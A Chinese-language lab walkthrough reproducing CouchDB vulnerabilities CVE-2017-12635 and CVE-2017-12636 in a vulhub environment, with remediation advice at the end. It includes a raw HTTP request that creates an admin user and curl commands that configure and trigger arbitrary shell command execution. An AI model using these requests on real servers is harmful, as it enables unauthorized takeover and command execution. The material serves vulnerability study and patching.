13 - vulhub - Couchdb 任意命令执行漏洞(CVE-2017-12636)

Others 2021-11-18 20:09:50 views: null

文章目录

漏洞名称:Couchdb 任意命令执行漏洞(CVE-2017-12636)

简介:

Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。

在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12636是一个任意命令执行漏洞,我们可以通过config api修改couchdb的配置query_server,这个配置项在设计、执行view的时候将被运行。

影响版本

小于 1.7.0 以及小于 2.1.1

漏洞原理

可以通过config api修改couchdb的配置query_server,这个配置项在设计、执行view的时候将被运行。

CouchDB管理用户可以通过HTTP(S)配置数据库服务器,其中可以启用的配置选项包括操作系统级二进制文件的路径。这允许CouchDB管理员用户以CouchDB用户的身份执行任意shell命令,包括从公共互联网上下载和执行脚本。

漏洞复现

环境准备

Couchdb 2.x和1.x的API接口有一定的区别,所以这个漏洞的利用方式也不同。本环境启动是1.6.0版本,如果你想测试2.1.0版本,可以启动CVE-2017- 12635附带的环境。

靶机环境   139.196.87.102  (vulhub)
攻击机环境  192.168.8.137  (虚拟机 Ubuntu 20、Java1.8、Burp)

启动 Couchdb 垂直权限绕过漏洞 环境

1.进入 vulhub 的 Couchdb 任意命令执行漏洞 路径
cd /usr/local/tools/vulhub/couchdb/CVE-2017-12636

2.编译并启动环境
docker-compose up -d

3.查看环境运行状态
docker ps | grep vulhub

在这里插入图片描述

启动完成后,访问http://139.196.87.102:5984/浏览Couchdb的欢迎页面。

在这里插入图片描述

漏洞检测

漏洞检测

开发或运维人员检查是否使用了受影响版本范围内的Apache CouchDB,是否配置了强口令和网络访问控制策略。

漏洞利用

该漏洞是需要登录用户方可触发,如果不知道目标管理员密码,可以利用 CVE-2017-12635 先增加一个管理员用户。

增加管理用户的数据包如下

PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: 139.196.87.102:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 108

{
  "type": "user",
  "name": "vulhub",
  "roles": ["_admin"],
  "roles": [],
  "password": "vulhub"
}

在这里插入图片描述

1.7.0 以下的说明
依次执行如下请求即可触发任意命令执行:

curl -X PUT 'http://vulhub:[email protected]:5984/_config/query_servers/cmd' -d '"id >/tmp/success"'
curl -X PUT 'http://vulhub:[email protected]:5984/vultest'
curl -X PUT 'http://vulhub:[email protected]:5984/vultest/vul' -d '{"_id":"770895a97726d5ca6d70a22173005c7b"}'
curl -X POST 'http://vulhub:[email protected]:5984/vultest/_temp_view?limit=10' -d '{"language":"cmd","map":""}' -H 'Content-Type:application/json'

其中,vulhub:vulhub为管理员账号密码。

第一个请求是添加一个名字为cmd的query_servers,其值为"id >/tmp/success",这就是我们要执行的命令。

第二、三个请求是添加一个数据库和文档,这里添加了一个可以查询的。

第四个请求在这个数据库里进行,因为我将其设置为cmd,这里就是我最初cmd的开始添加的命名的query_servers最后触发命令执行。

在这里插入图片描述

验证漏洞利用是否成功

进入容器查看 /tmp/ 路径下 是否生成 success 文件

在这里插入图片描述

修复建议

1.公网Apache CouchDB实例

建议升级到最新版本。

使用ECS安全组或防火墙策略,限制CouchDB端口暴露在互联网,设置精细化网络访问控制。

开启认证功能,不要使用默认账号口令,配置自定义账号和强口令,防止暴力破解攻击事件。

2.内网Apache CouchDB实例

使用ECS安全组或防火墙策略,限制CouchDB端口暴露在互联网,设置精细化网络访问控制。

开启认证功能,不要使用默认账号口令,配置自定义账号和强口令,防止暴力破解攻击事件。

关于 2.1.0 以下的说明及EXP利用方式

参考:https://blog.csdn.net/whatday/article/details/106618050

参考:https://www.freesion.com/article/7205843932/

参考:https://www.linuxlz.com/aqld/2315.html

Guess you like

Origin blog.csdn.net/weixin_42250835/article/details/120905030
Recommended
Ranking
error: (-215:Assertion failed) !_img.empty() in function ‘cv::imwrite‘
Database migration between Navicat servers
Minimum number of rotation of the array: Array
balenaEtcher for mac (make a boot disk software) v1.5.67
Custom processing serialization and deserialization in jackson
Mu-en-mask system development software
Mastering Regular Expressions
Find mileage Java--
Web pages can not directly concern the public micro-channel number how to do? A key to arouse public concern number of micro-channel solutions
[CodeForces - 739B] Alyona and a tree Tree + [difference] + bipartite
Daily
More
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)

Code World

© 2018 codetd.com